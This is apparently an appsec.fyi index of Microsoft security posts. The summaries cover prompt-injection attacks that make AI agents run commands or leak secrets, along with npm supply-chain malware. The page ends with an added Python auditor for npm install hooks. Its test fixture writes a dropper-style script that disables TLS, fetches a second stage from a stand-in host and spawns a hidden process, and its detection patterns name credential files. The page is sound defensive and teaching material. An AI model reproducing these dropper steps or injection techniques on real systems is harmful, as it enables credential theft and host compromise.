microsoft.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-06-25.
| Date Added | Resource | Topic | Excerpt |
|---|---|---|---|
| 2026-06-25 | Taming our Python dependencies at Microsoft with AIPython |  | Microsoft describes using AI (AIPython) to manage its large Python dependency graph: analyzing dependencies, surfacing known vulnerabilities, and keeping the tracking, updating and securing of Python packages consistent across its many projects, with the stated goal of more robust and reliable software. |
| 2026-06-22 | AutoJack: How a single page can RCE the host running your AI agent | RCE | Technique writeup showing how a single web page can achieve remote code execution on the host running an AI agent, demonstrated against AutoGen Studio. AutoJack chains three weaknesses in the Model Context Protocol (MCP) WebSocket endpoint: an origin allowlist that an agent can easily bypass, authentication middleware that is opt-out rather than opt-in, and `server_params` taken from the URL without validation. A page the agent browses can therefore drive it into executing arbitrary commands on its own host, crossing the localhost trust boundary and turning the agent into the delivery vehicle for RCE. |
| 2026-06-18 | From package to postinstall payload: Inside the Mastra npm supply chain compromise | Supply Chain | Analysis of the Mastra npm supply chain compromise, in which the `ehindero` maintainer account was used to inject a malicious `easy-day-js` package dependency. The package's postinstall hook disabled TLS certificate verification, downloaded a second-stage payload and executed it as a hidden process. The writeup covers the staged delivery, the obfuscated dropper, C2 communication, and Windows-specific techniques such as reflective .NET assembly injection and host fingerprinting used for persistence and further exploitation. |
| 2026-06-08 | Securing CI/CD in an agentic world: Claude Code GitHub Action case | AI | Case study in securing CI/CD workflows that run AI agents, built around a vulnerability in Anthropic's Claude Code GitHub Action. The action's Read tool was not sandboxed the way its Bash tool was, so a prompt-injected agent could read `/proc/self/environ` and exfiltrate secrets such as `ANTHROPIC_API_KEY`. Microsoft Threat Intelligence reported the issue, which was fixed in version 2.1.128. The post illustrates prompt injection delivered through HTML comments and disguised feature requests, and the broader risk of agents processing untrusted GitHub content while holding file-read capabilities or access to secrets. |
| 2026-06-03 | Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign | Supply Chain | Detection guidance for the "Miasma" supply chain attack, which compromised 32 npm packages under the @redhat-cloud-services scope. Obfuscated dropper scripts downloaded the Bun JavaScript runtime and stole credentials for GitHub, npm, AWS, Azure, GCP, HashiCorp Vault and Kubernetes. The payload also attempted privilege escalation via passwordless sudo, self-propagated by publishing poisoned packages with forged SLSA provenance, and carried a destructive tripwire that wiped the home directory. |
| 2026-05-30 | Malicious npm packages abuse dependency confusion to profile developer environments | Supply Chain | Detection guidance for malicious npm packages that exploit dependency confusion to profile developer environments. The packages impersonate internal corporate namespaces (namespace squatting with spoofed enterprise metadata and inflated version numbers) and use npm lifecycle hooks to run automatically during `npm install`, pulling obfuscated reconnaissance payloads from attacker-controlled C2 servers. The payloads employ anti-analysis techniques, target several operating systems, and run in a reconnaissance-only mode that collects system information and credentials for potential follow-on exploitation. |
| 2026-05-29 | Typosquatted npm packages used to steal cloud and CI/CD secrets | Supply Chain | Analysis of an npm supply chain attack in which typosquatted packages such as "opensearch-setup" and "elastic-opensearch-helper" were used to steal AWS credentials, HashiCorp Vault tokens and CI/CD secrets. The packages use npm lifecycle hooks to launch a credential harvester that queries AWS IMDSv2, the ECS task metadata endpoint and Secrets Manager across multiple regions, and collects npm publish tokens, enabling cloud lateral movement and pivoting into downstream supply chains. |
| 2026-05-21 | Mini Shai Hulud: Compromised @antv npm packages enable CI/CD credential theft | Supply Chain | Detection and mitigation guidance for the Mini Shai Hulud supply chain attack, which compromised @antv npm packages. Obfuscated JavaScript stole credentials from GitHub Actions, AWS, HashiCorp Vault, npm, Kubernetes and 1Password, using runner memory scraping, privilege escalation via bind mounts, dual-channel exfiltration over HTTPS and the Git Data API, and SLSA provenance forgery. The post helps identify affected systems and pin known-safe package versions. |
| 2026-05-13 | Defense at AI speed: Microsoft's new multi-model agentic security system tops leading industry benchmark | RCE | Describes MDASH, Microsoft's agentic AI vulnerability-discovery system, which orchestrates more than 100 specialized agents across an ensemble of frontier and distilled models to find and prove exploitable bugs. It reports top scores on a leading industry benchmark and 16 new vulnerabilities in Windows networking and authentication components, four of them Critical remote code execution flaws in components such as the TCP/IP stack and the IKEv2 service. The end-to-end pipeline runs through preparation, scanning, validation, deduplication and proof stages, presented as a step toward production-grade, enterprise-scale AI vulnerability defense. |
| 2026-05-07 | When prompts become shells: RCE vulnerabilities in AI agent frameworks | RCE | Security analysis of AI agent frameworks, centered on the RCE vulnerabilities CVE-2026-25592 and CVE-2026-26030 in Semantic Kernel. It shows how prompt injection reaches host-level code execution through unsafe string interpolation and blocklist bypasses in plugins such as the In-Memory Vector Store, letting an attacker turn Semantic Kernel's tool execution capabilities to malicious ends. |
| 2026-05-02 | CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments | AuthZ | Analysis of CVE-2026-31431, nicknamed "Copy Fail", a high-severity Linux kernel vulnerability affecting Red Hat, Ubuntu, SUSE and Amazon Linux. A logic flaw in the AF_ALG module lets a local unprivileged user corrupt the kernel page cache and gain root. The exploit is a small script built on the `splice()` system call and AF_ALG, enabling container breakout and lateral movement in Kubernetes clusters and other multi-tenant cloud workloads. Microsoft Defender provides detection insights, mitigation recommendations and hunting guidance. |
| 2026-04-11 | Shai-Hulud 2.0: Detection and Defense Guidance | Supply Chain | Detection and defense guidance for the Shai-Hulud 2.0 supply chain attack, which compromised numerous npm packages through preinstall scripts and stole credentials with tools such as TruffleHog. It details propagation paths, the use of fake personas (one posing as "Linus Torvalds"), and mitigations including credential rotation, CI/CD isolation, and Microsoft Defender's code scanning, posture management and runtime anomaly detection. |
| 2026-04-11 | Intent redirection vulnerability in third-party SDK exposed millions of Android wallets | Mobile | Writeup of an intent redirection vulnerability in EngageSDK, a third-party Android library embedded in millions of applications, including crypto wallets. The exported `MTCommonActivity` component accepted attacker-crafted intents, letting a malicious app bypass Android's application sandbox to reach sensitive user data including PII and financial information, with unauthorized access, data exposure and privilege escalation as outcomes. Google removed affected apps from the Play Store and shipped platform-level mitigations; developers are urged to update to EngageSDK version 5.2.1. |
| 2026-04-11 | How Microsoft Defends Against Indirect Prompt Injection Attacks | AI | Overview of Microsoft's multi-layered defense against indirect prompt injection attacks on LLM-based systems: prevention (hardened system prompts, Spotlighting), detection (Microsoft Prompt Shields integrated with Defender for Cloud), and impact mitigation (data governance, user consent workflows, deterministic blocking). It addresses data exfiltration via HTML images, clickable links, tool calls and covert channels, as well as unintended actions and phishing. |
| 2026-04-10 | Defending Against React2Shell in React Server Components | RCE | Reference on CVE-2025-55182 (React2Shell), a critical pre-authentication RCE vulnerability in React Server Components affecting frameworks such as Next.js. Insecure payload validation and prototype pollution let an attacker execute arbitrary code with a single HTTP request. Observed exploitation targets Windows and Linux environments, deploying coin miners and RATs and using TruffleHog and Gitleaks to harvest cloud credentials. Mitigation: patch immediately to fixed React and Next.js versions, prioritizing internet-facing assets, with WAF protections as an interim layer. |
| 2026-04-10 | Weaponizing Cross Site Scripting: When One Bug Isn't Enough | XSS | Technique guide on weaponizing Cross-Site Scripting by chaining it with open redirects, CSRF, weak CSP, insecure JSON logging (leading to account takeover), file upload flaws (leading to RCE), abuse of administrative functions, and improper `postMessage` usage (token leakage). Its point is that XSS rarely exists in isolation: attackers combine several weaknesses to escalate impact, which makes layered defenses crucial. |
| 2026-04-08 | Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations | RCE | Analysis of Storm-1175's high-tempo Medusa ransomware operations, which exploit N-day vulnerabilities such as CVE-2023-21529 (Microsoft Exchange), CVE-2023-27351 (PaperCut) and CVE-2024-21887 (Ivanti), alongside zero-days. The actor rapidly chains exploits, establishes persistence by creating new users, and uses PsExec, RMM tools (Atera, N-able), PDQ Deployer and Impacket for lateral movement and credential theft before deploying ransomware. |
| 2026-04-04 | Detecting and analyzing prompt abuse in AI tools | AI | Playbook for detecting, investigating and responding to AI prompt abuse. It covers direct prompt overrides, extractive prompt abuse against sensitive inputs, and indirect prompt injection, including the HashJack technique, which targets AI summarization tools via URL fragments. The guidance uses Microsoft security tooling (Defender for Cloud Apps, Purview DLP, Microsoft Entra ID Conditional Access and Microsoft Sentinel) to monitor AI interactions and protect against manipulation. |
| 2026-04-03 | Mitigating the Axios npm supply chain compromise | Supply Chain | Analysis of the Axios npm supply chain compromise, in which the North Korean state actor Sapphire Sleet injected malicious dependencies into Axios versions 1.14.1 and 0.30.4. These releases pulled in a fake runtime dependency, `plain-crypto-js@4.2.1`, that executed silently at install time and contacted a Sapphire Sleet-controlled C2 server at `hxxp://sfrclak[.]com:8000/6202033` to download platform-specific remote access trojan (RAT) payloads for Windows, macOS and Linux. The post underlines how poisoning a widely adopted open-source library gives an actor broad downstream impact. |
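Several of the entries above (Mastra, Miasma, the dependency-confusion and typosquatting campaigns, Mini Shai Hulud, Shai-Hulud 2.0, Axios) share one execution vector: an npm lifecycle hook that runs during `npm install`. The script below is an added example written for this page, not code from Microsoft or from any indexed post. It walks an installed tree, lists every package that declares a lifecycle hook, follows `node <file>.js` hooks into the referenced file, and flags the install-time behaviours those writeups describe (TLS verification disabled, a second-stage download, a hidden or detached process). The packages it builds (`easy-day-ish` and the others) are constructed stand-ins, and the regex heuristics are illustrative rather than a complete signature set.

```python
"""Audit an installed npm tree for lifecycle hooks and suspicious install-time
behaviour. Added example for the appsec.fyi index page; not code from Microsoft
or any indexed post. Sample packages are constructed fixtures, not real packages."""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics only (assumption: illustrative patterns, not a complete signature set).
SUSPICIOUS = [
    (re.compile(r"NODE_TLS_REJECT_UNAUTHORIZED\W{0,5}0"), "disables TLS verification"),
    (re.compile(r"rejectUnauthorized\s*:\s*false"), "disables TLS verification"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|https?\.get|fetch)\b"), "downloads at install time"),
    (re.compile(r"windowsHide\s*:\s*true|detached\s*:\s*true|\bnohup\b"), "spawns hidden/background process"),
    (re.compile(r"\.npmrc|\.aws/credentials|\.kube/config|VAULT_TOKEN"), "touches credential stores"),
]


def _script_text(pkg_dir: Path, command: str) -> str:
    """Return the hook command plus the body of any local JS file it runs
    (e.g. `node scripts/setup.js`), so a payload hidden in the file is scanned too."""
    text = command
    for ref in re.findall(r"(?:node\s+)(\S+\.c?js)", command):
        target = pkg_dir / ref
        if target.is_file():
            text += "\n" + target.read_text(errors="replace")
    return text


def audit_manifest(manifest: Path) -> Optional[Dict]:
    """Report the lifecycle hooks of one package.json, or None if it has none."""
    data = json.loads(manifest.read_text())
    hooks = {k: v for k, v in data.get("scripts", {}).items() if k in LIFECYCLE_HOOKS}
    if not hooks:
        return None
    findings = []
    for hook, cmd in hooks.items():
        blob = _script_text(manifest.parent, cmd)
        flags = sorted({label for pat, label in SUSPICIOUS if pat.search(blob)})
        findings.append({"hook": hook, "command": cmd, "flags": flags})
    return {"package": data.get("name"), "version": data.get("version"), "hooks": findings}


def audit_tree(root: Path) -> List[Dict]:
    """Walk every package.json under root (node_modules and nested copies)."""
    results = [audit_manifest(p) for p in sorted(root.rglob("package.json"))]
    return [r for r in results if r]


def flagged_packages(root: Path) -> List[str]:
    """Names of packages whose hooks matched at least one heuristic."""
    return [r["package"] for r in audit_tree(root) if any(h["flags"] for h in r["hooks"])]


def build_sample_tree(root: Path) -> None:
    """Constructed fixtures: one package without hooks, one with a benign build
    hook, one whose postinstall mirrors the staged-dropper pattern described above."""
    def write(rel: str, content: str) -> None:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)

    write("node_modules/left-pad-ish/package.json",
          json.dumps({"name": "left-pad-ish", "version": "1.0.0"}))
    write("node_modules/ts-lib/package.json",
          json.dumps({"name": "ts-lib", "version": "2.0.0", "scripts": {"prepare": "tsc -p ."}}))
    write("node_modules/easy-day-ish/package.json",
          json.dumps({"name": "easy-day-ish", "version": "0.9.1",
                      "scripts": {"postinstall": "node scripts/setup.js"}}))
    write("node_modules/easy-day-ish/scripts/setup.js",
          "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';\n"
          "const https = require('https');\n"
          "https.get('https://example.invalid/stage2', r => r.resume());\n"
          "require('child_process').spawn(process.execPath, ['stage2.js'], "
          "{detached: true, windowsHide: true});\n")


def run_demo() -> Dict[str, object]:
    """Build the constructed tree in a temp dir, audit it, and return the results."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_tree(root)
        return {"hooked": audit_tree(root), "flagged": flagged_packages(root)}


if __name__ == "__main__":
    out = run_demo()
    for entry in out["hooked"]:
        print(json.dumps(entry, indent=2))
    print("flagged:", out["flagged"])
```

Against a real checkout, call `audit_tree(Path("node_modules"))` after installing. The structural countermeasure the supply-chain posts converge on is to install with `npm ci --ignore-scripts` and then allow hooks only for the few packages that genuinely need a native build step.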